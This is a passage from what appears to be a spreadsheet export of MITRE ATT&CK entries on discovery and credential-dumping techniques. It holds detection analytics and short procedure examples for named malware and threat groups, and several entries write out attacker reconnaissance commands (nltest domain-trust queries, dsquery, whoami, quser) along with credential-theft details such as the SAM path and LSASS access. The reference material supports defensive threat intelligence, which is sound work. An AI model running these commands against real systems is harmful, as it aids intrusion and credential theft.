[Crimson](https://attack.mitre.org/software/S0115) contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
CrossRAT
[CrossRAT](https://attack.mitre.org/software/S0235) can list all files on a system.(Citation: Lookout Dark Caracal Jan 2018)
Cryptoistic
[Cryptoistic](https://attack.mitre.org/software/S0498) can scan a directory to identify files for deletion.(Citation: SentinelOne Lazarus macOS July 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can enumerate files by using a variety of functions.(Citation: McAfee Cuba April 2021)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can use the Linux API `statvfs` to enumerate the current working directory.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)
DDKONG
[DDKONG](https://attack.mitre.org/software/S0255) lists files on the victim’s machine.(Citation: Rancor Unit42 June 2018)
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use loop operations to enumerate directories on a compromised host.(Citation: FireEye FiveHands April 2021)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) can scan directories on a compromised host.(Citation: TrendMicro macOS Dacls May 2020)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has the ability to enumerate file and folder names.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) has several commands to search directories for files.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of obtaining directory, file, and drive listings.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has a command to traverse the files and directories in a given path.(Citation: Fortinet Diavol July 2021) 
Doki
[Doki](https://attack.mitre.org/software/S0600) has resolved the path of a process PID to use as a script argument.(Citation: Intezer Doki July 20)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) can collect the names of all files and folders in the Program Files directories.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) 
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can list files on available disk volumes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)
ELMER
[ELMER](https://attack.mitre.org/software/S0064) is capable of performing directory listings.(Citation: FireEye EPS Awakens Part 2)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can list directory entries.(Citation: ESET Ebury Oct 2017) 
Elise
A variant of [Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;dir C:\progra~1&lt;/code&gt; when initially run.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) includes various modules for finding files of interest on hosts and network shares.(Citation: Github PowerShell Empire)
Epic
[Epic](https://attack.mitre.org/software/S0091) recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) can search files on a victim.(Citation: US-CERT FALLCHILL Nov 2017)
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)
FLASHFLOOD
[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.(Citation: FireEye APT30)
FYAnti
[FYAnti](https://attack.mitre.org/software/S0628) can search the &lt;code&gt;C:\Windows\Microsoft.NET\&lt;/code&gt; directory for files of a specified size.(Citation: Securelist APT10 March 2021)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can enumerate directories on target machines.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) enumerates directories and scans for certain files.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can check for the [FoggyWeb](https://attack.mitre.org/software/S0661) backdoor .pri file on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)
Forfiles
[Forfiles](https://attack.mitre.org/software/S0193) can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)(Citation: Überwachung APT28 Forfiles June 2015)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) looks for specific files and file types.(Citation: objsee mac malware 2017)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.(Citation: Bitdefender FunnyDream Campaign November 2020)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has the ability to search for files.(Citation: Fysbis Dr Web Analysis) 
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can retrieve data from specific Windows directories, as well as open random files as part of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497).(Citation: ESET Gelsemium June 2021)
GeminiDuke
[GeminiDuke](https://attack.mitre.org/software/S0049) collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.(Citation: F-Secure The Dukes)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) lists the directories for Desktop, program files, and the user’s recently accessed files.(Citation: McAfee Gold Dragon)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) has included a program "ExeProtector", which monitors for the existence of [GoldenSpy](https://attack.mitre.org/software/S0493) on the infected system and redownloads if necessary.(Citation: Trustwave GoldenSpy June 2020)	
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to enumerate files and directories on a compromised host.(Citation: Group IB GrimAgent July 2021)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed enumerating system drives and partitions.(Citation: US-CERT HOPLIGHT Apr 2019)	
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of listing files, folders, and drives on a victim.(Citation: Dell TG-3390)(Citation: ZScaler Hacking Team)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can enumerate common folders such as My Documents, Desktop, and AppData.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has the ability to search the compromised host for files.(Citation: SentinelOne Aoqin Dragon June 2022)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
IceApple
The [IceApple](https://attack.mitre.org/software/S1022) Directory Lister module can list information about files and directories including creation time, last write time, name, and size.(Citation: CrowdStrike IceApple May 2022)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper component enumerates specific files on all the Windows drives.(Citation: ESET Industroyer)
InnaputRAT
[InnaputRAT](https://attack.mitre.org/software/S0259) enumerates directories and obtains file attributes on a system.(Citation: ASERT InnaputRAT April 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can list information about files in a directory and recently opened or used documents. [InvisiMole](https://attack.mitre.org/software/S0260) can also search for specific files by supplied file mask.(Citation: ESET InvisiMole June 2018)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) can list file and directory information.(Citation: Trend Micro IXESHE 2012)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can enumerate drives and their types. It can also change file permissions using cacls.exe.(Citation: Microsoft PLATINUM April 2016)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to search for files on the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can enumerate files and directories on a compromised host.(Citation: Cybereason Kimsuky November 2020)
KONNI
A version of [KONNI](https://attack.mitre.org/software/S0356) searches for filenames created with a previous version of the malware,</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to gather system and network information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Note: Commands can also be obtained from Payload event field for PowerShell event id 4103. For PowerShell Module logging event id 4103, enable logging for module Microsoft.PowerShell.Management.
&lt;h4&gt; Analytic 1 - Suspicious Commands &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter commands where event_id == "4103" AND
  ((command_line LIKE '%Get-Process%' AND command_line_parameter LIKE '%mainWindowTitle%'))&lt;/code&gt;
OS API Execution
Monitor for API calls (such as &lt;code&gt;GetForegroundWindow()&lt;/code&gt;) that may attempt to get a listing of open application windows. &lt;code&gt;GetForegroundWindow&lt;/code&gt; api returns a handle to the foreground window (the window with which the user is currently working). Other API calls relevant to Local Group discovery include &lt;code&gt; GetProcesses&lt;/code&gt; and &lt;code&gt;GetForegroundWindow&lt;/code&gt;. &lt;code&gt;GetProcesses&lt;/code&gt; api returns an array of type Process that represents all the process resources running on the local computer.
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary. 
&lt;h4&gt; Analytic 1 - Suspicious API Calls&lt;/h4&gt;
&lt;code&gt; suspicious_apis = filter processes where ApiName LIKE '%GetProcesses%' OR ApiName LIKE '%GetForegroundWindow%'&lt;/code&gt;
Process Creation
Monitor for newly executed processes that may attempt to get a listing of open application windows. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created).
&lt;h4&gt; Analytic 1 - Suspicious Processes&lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter process where 
  (event_id == "1" OR event_id == "4688") AND
  (command_line LIKE '%Get-Process%' AND command_line LIKE '%mainWindowTitle%')&lt;/code&gt;
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used a PowerShell-based keylogging tool to capture the window title.(Citation: SecureWorks August 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)
Attor
[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) obtains application windows titles and then determines which windows to perform [Screen Capture](https://attack.mitre.org/techniques/T1113) on.(Citation: Symantec Catchamas April 2018)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) reports window names along with keylogger information to provide application context.(Citation: Prevailion DarkWatchman 2021)
Duqu
The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on open windows.(Citation: Symantec W32.Duqu)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can check the name of the window displayed on the system.(Citation: NTT Security Flagpro new December 2021) 
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to discover application windows via execution of `EnumWindows`.(Citation: Bitdefender FunnyDream Campaign November 2020)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on window names.(Citation: ESET Grandoreiro April 2020)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate windows and child windows on a compromised host.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) gathers information about opened windows.(Citation: Unit 42 Kazuar May 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) saves the window names.(Citation: ESET Machete July 2019) 
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) can enumerate all windows on the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can discover and close windows on controlled systems.(Citation: Red Canary NETWIRE January 2020)
NetTraveler
[NetTraveler](https://attack.mitre.org/software/S0033) reports window names along with keylogger information to provide application context.(Citation: Kaspersky NetTraveler)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can use `GetForegroundWindow` to enumerate the active window.(Citation: MoustachedBouncer ESET August 2023)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: TrendMicro BlackTech June 2017)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) captures window titles.(Citation: Symantec Darkmoon Aug 2005)
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get text of the current foreground window.(Citation: Volexity PowerDuke November 2016)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has the ability to enumerate windows on a compromised host.(Citation: ATT QakBot April 2021)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can use  the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.(Citation: Talos ROKRAT)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) has a command to capture active windows on the machine and retrieve window titles.(Citation: Securelist Remexi Jan 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate the active Window during keylogging through execution of `GetActiveWindowTitle`.(Citation: GitHub SILENTTRINITY Modules July 2019)
SOUNDBITE
[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating application windows.(Citation: FireEye APT32 May 2017)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can monitor the titles of open windows to identify specific keywords.(Citation: Secureworks Karagany July 2019)	 
WINERACK
[WINERACK](https://attack.mitre.org/software/S0219) can enumerate active windows.(Citation: FireEye APT37 Feb 2018)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) gathers information about opened windows during the initial infection.(Citation: Fidelis njRAT June 2013)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to gather system and network information, such as nltest /domain_trusts. Remote access tools with built-in features may interact directly with the Windows API to gather information.
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to LDAP and MSRPC that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure).
OS API Execution
Monitor for API calls associated with gathering information on domain trust relationships that may be used to identify lateral movement like DSEnumerateDomainTrusts() Win32 API call to spot activity associated with Domain Trust Discovery.(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as PowerShell. The .NET method GetAllTrustRelationships() can be an indicator of Domain Trust Discovery.(Citation: Microsoft GetAllTrustRelationships)
Process Creation
Monitor for newly executed processes that may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.
Script Execution
Monitor for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Audit
Map the trusts within existing domains/forests and keep trust relationships to a minimum.
Network Segmentation
Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts).
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.(Citation: DFIR Conti Bazar Nov 2021)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used the `Get-AcceptedDomain` PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell.(Citation: Volexity SolarWinds) They also used [AdFind](https://attack.mitre.org/software/S0552) to enumerate domains and to discover trust between federated domains.(Citation: CrowdStrike StellarParticle January 2022)(Citation: Microsoft Deep Dive Solorigate January 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has &lt;code&gt;nltest /domain_trusts&lt;/code&gt; to identify domain trust relationships.(Citation: NCC Group Chimera January 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has retrieved a list of trusted domains by using &lt;code&gt;nltest.exe /domain_trusts&lt;/code&gt;.(Citation: Bitdefender FIN8 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used a web shell to execute `nltest /trusted_domains` to identify trust relationships.(Citation: DFIR Phosphorus November 2021)
AdFind
[AdFind](https://attack.mitre.org/software/S0552) can gather information about organizational units (OUs) and domain trusts from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Symantec Bumblebee June 2022)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use `nltest.exe /domain_trusts` to discover domain trust relationships on a compromised machine.(Citation: BitDefender BADHATCH Mar 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can use [Nltest](https://attack.mitre.org/software/S0359) tools to obtain information about the domain.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) has the ability to map domain trusts and identify misconfigurations for potential abuse.(Citation: CrowdStrike BloodHound April 2018)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use LDAP queries and `nltest /domain_trusts` for domain trust discovery.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)
Empire
[Empire](https://attack.mitre.org/software/S0363) has modules for enumerating domain trusts.(Citation: Github PowerShell Empire)
Nltest
[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate trusted domains by using commands such as &lt;code&gt;nltest /domain_trusts&lt;/code&gt;.(Citation: Nltest Manual)(Citation: Fortinet TrickBot)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) has modules for enumerating domain trusts.(Citation: GitHub PoshC2)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) has modules such as &lt;code&gt;Get-NetDomainTrust&lt;/code&gt; and &lt;code&gt;Get-NetForestTrust&lt;/code&gt; to enumerate domain and forest trusts.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can run &lt;code&gt;nltest /domain_trusts /all_trusts&lt;/code&gt; for domain trust discovery.(Citation: Kaspersky QakBot September 2021)
Rubeus
[Rubeus](https://attack.mitre.org/software/S1071) can gather information about domain trusts.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)(Citation: Cyberreason Anchor December 2019)
dsquery
[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on domain trusts with &lt;code&gt;dsquery * -filter "(objectClass=trustedDomain)" -attr *&lt;/code&gt;.(Citation: Harmj0y Domain Trusts)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Access
Monitor for abnormal LDAP queries with filters for &lt;code&gt;groupPolicyContainer&lt;/code&gt; and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.
Command Execution
Monitor for suspicious use of &lt;code&gt;gpresult&lt;/code&gt;. Monitor for the use of PowerShell functions such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt; and processes spawning with command-line arguments containing &lt;code&gt;GPOLocalGroup&lt;/code&gt;.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Process Creation
Monitor for newly executed processes that may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.
Script Execution
Monitor for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Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover Group Policy details using the &lt;code&gt;gpresult&lt;/code&gt; command.(Citation: ESET ComRAT May 2020)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) has the ability to collect local admin information via GPO.(Citation: GitHub Bloodhound)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute &lt;code&gt;gpresult&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)
Empire
[Empire](https://attack.mitre.org/software/S0363) includes various modules for enumerating Group Policy.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t>Active Directory Object Access
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Monitor for replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
Command Execution
Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command-lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on abuse of CMSTP. 
File Access
Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised  [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.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Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols.
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
OS API Execution
Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
Process Access
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
##### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/maps&lt;/code&gt;, where the &lt;code&gt;&amp;lt;pid&amp;gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
Process Creation
Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of [at](https://attack.mitre.org/software/S0110) being created, therefore implying the querying or creation of tasks. If this tools is commonly used in your environment (e.g., by system administrators) this may lead to false positives and this analytic will therefore require tuning. 
&lt;h4&gt; Analytic 1 - Suspicious Process Execution&lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  exe == "at.exe") &lt;/code&gt;
Windows Registry Key Access
Monitor for the SAM registry key being accessed that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `whoami` to gather information from victim machines.(Citation: Mandiant APT41)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors collected `whoami` information via PowerShell scripts.(Citation: Costa AvosLocker May 2022)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to enumerate hosts and gather username, machine name, and administrative permissions information.(Citation: Talos Frankenstein June 2019)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.(Citation: FoxIT Wocao December 2019)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username.(Citation: Unit 42 C0d0so0 Jan 2016)
APT3
An [APT3](https://attack.mitre.org/groups/G0022) downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt; to verify that it is running with the elevated privileges of “System.”(Citation: FireEye Operation Double Tap)
APT32
[APT32](https://attack.mitre.org/groups/G0050) collected the victim's username and executed the &lt;code&gt;whoami&lt;/code&gt; command on the victim's machine. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to collect the username on the victim's machine. (Citation: FireEye APT32 April 2020)(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)
APT37
[APT37](https://attack.mitre.org/groups/G0067) identifies the victim username.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) used [Remexi](https://attack.mitre.org/software/S0375) to collect usernames from the system.(Citation: Symantec Chafer Dec 2015)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute &lt;code&gt;whoami&lt;/code&gt; commands on remote machines.(Citation: FireEye APT41 Aug 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used the &lt;code&gt;quser&lt;/code&gt; command to show currently logged on users.(Citation: NCC Group Chimera January 2021) 
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) used the command &lt;code&gt;query user&lt;/code&gt; on victim hosts.(Citation: US-CERT TA18-074A)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: TrendMicro EarthLusca 2022)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has used Meterpreter to enumerate users on remote systems.(Citation: FireEye FIN10 June 2017)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used the command `cmd.exe /C quser` to collect user session information.(Citation: Mandiant FIN7 Apr 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has executed the command `quser` to display the session details of a compromised machine.(Citation: Symantec FIN8 Jul 2023) 
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; to obtain information about the victim user.(Citation: Cybereason Soft Cell June 2019)
Gamaredon Group
A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's username to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used `whoami` to gather user information.(Citation: Rapid7 HAFNIUM Mar 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has run `whoami` on compromised machines to identify the current user.(Citation: Kaspersky Lyceum October 2021)
Ke3chang
